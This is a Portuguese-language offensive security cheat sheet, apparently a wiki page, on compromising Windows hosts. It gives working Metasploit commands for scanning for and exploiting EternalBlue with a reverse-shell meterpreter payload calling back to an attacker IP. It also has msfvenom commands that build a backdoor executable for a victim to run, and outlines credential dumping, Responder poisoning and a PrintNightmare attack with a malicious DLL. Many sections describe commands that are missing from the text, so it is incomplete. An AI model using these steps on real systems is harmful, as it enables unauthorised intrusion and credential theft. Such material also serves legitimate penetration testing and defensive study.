Windows

Metasploit

Atacando Windows 7 (Eternal Blue)

Procurando por alvos na rede

msfconsole
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.1.0/24
set threads 100
run

Explorando a falha

msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <ip_alvo>
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <ip_atacante>
exploit

Atacando Windows 7 (Vírus)

O Msfvenom é utilizado nas novas versões do Metasploit, substituindo o msfpayload / msfencode.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip_atacante> LPORT=<port> x > /tmp/backdoor.exe
# ou
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip_atacante> LPORT=<port> -a x86 -f exe -o /root/payload.exe

Faça com que o alvo execute o arquivo .exe:

Entre no modo listener:

Se até aqui tiver sido efetuado com êxito, irá ser aberto o meterperter.

Atacando Windows 7 pelo Internet Explorer

Agora faça com que o alvo abra http://<ip_atacante>:8080/videos pelo Internet Explorer.

Atacando Windows 7 com JAVA

O JAVA tem de estar numa versão um pouco mais antiga para que funcione

Agora faça com que o alvo acesse a URL e aceite o java para que o meterpreter tenha sucesso

Atacando Windows XP

Certifique-se antes de que a porta 445 do alvo esteja aberta

Se até aqui iver sido efetuado com êxito, irá ser aberto o meterperter

Ataque Via Browser

Agora faça o alvo acessar pelo navegador: http:// OBS.: Certifique-se que seu IP não esteja já utilizando a porta 80

Ativando RDP

Depois de conseguir acesso via Meterpreter, jogue a sessão em backgrund (CTRL + Z) e então execute o seguinte post:

Depois de ativar o RDP, podemos acessá-lo normalmente. Caso não saiba a senha do Administrador, podemos alterá-la ou até mesmo criar um usuário.

HTA Server (necessário ter RCE)

Enum4Linux

Esse tipo de enumaração pode ser grande e poluída a sua leitura, então foque "principalmente" nos itens output similar to nmblookup, check for null session, listing of shares, domain info, password policy e RID cycling output.

Caso queira filtrar por determinadas informações, podemos utilizar alguns recursos do enum4linux.

Pegando Senhas Locais Via LSA

Depois de acessar o Windows como Administrador, execute o comando lsadump2.

Pegando Senhas em Texto Limpo (NTLM)

Pegando Registros Manualmente

Isso também pode ser feito com secretsdump.py ou pwdump

Responder

Quando um sistema em uma rede faz uma pesquisa de nome de host DNS que falha, o sistema utiliza Link-Local Multicast Name Resolution (LLMNR) e o Net-BIOS para resolução de nomes substitutos. Quando o host da vítima falha na pesquisa de DNS, esse host começa a perguntar para qualquer host da rede se eles sabem a resolução para esse nome de host que ele está procurando.

Isso pode acontecer, por exemplo, quando o Windows tem uma unidade de rede mapeada e então esse host deixa de existir ou trocou de IP/hostname.

Antes de iniciar o responder, abra o arquivo /etc/responder/Responder.conf e edite o parâmetro RespondTo, filtrando somente pelos IPs (separados por vírgula) que deseja realmente atacar.

Caso pegue um hash do tipo NetNTLMv2, utilize hashcat com a opção -m 5600.

PrintNightmare

Execute o comando abaixo e verifique se as duas condições no grep estão de acordo.

Caso seja positivo, precisamos baixar o repositório da CVE.

Agora, vamos instalar (caso ainda não tenha) o virtualenv e executar os devidos comandos:

Com isso, estaremos dentro do ambiente virtual, então podemos executar a instalação.

Agora precisamos gerar nos DLL maliciosa e para isso podemos utilizar o msfvenom.

Deixando o Metasploit no modo listener.

Com o nosso ambiente já preparado para disparar o ataque e receber a reverse shell, vamos preciso subir um servidor SMB para que o host alvo possa acessar nossa DLL gerada com o msfvenom.

E por último, realizando o ataque de fato para obter a reverse shell no Meterpreter.

Sites

Last updated

Was this helpful?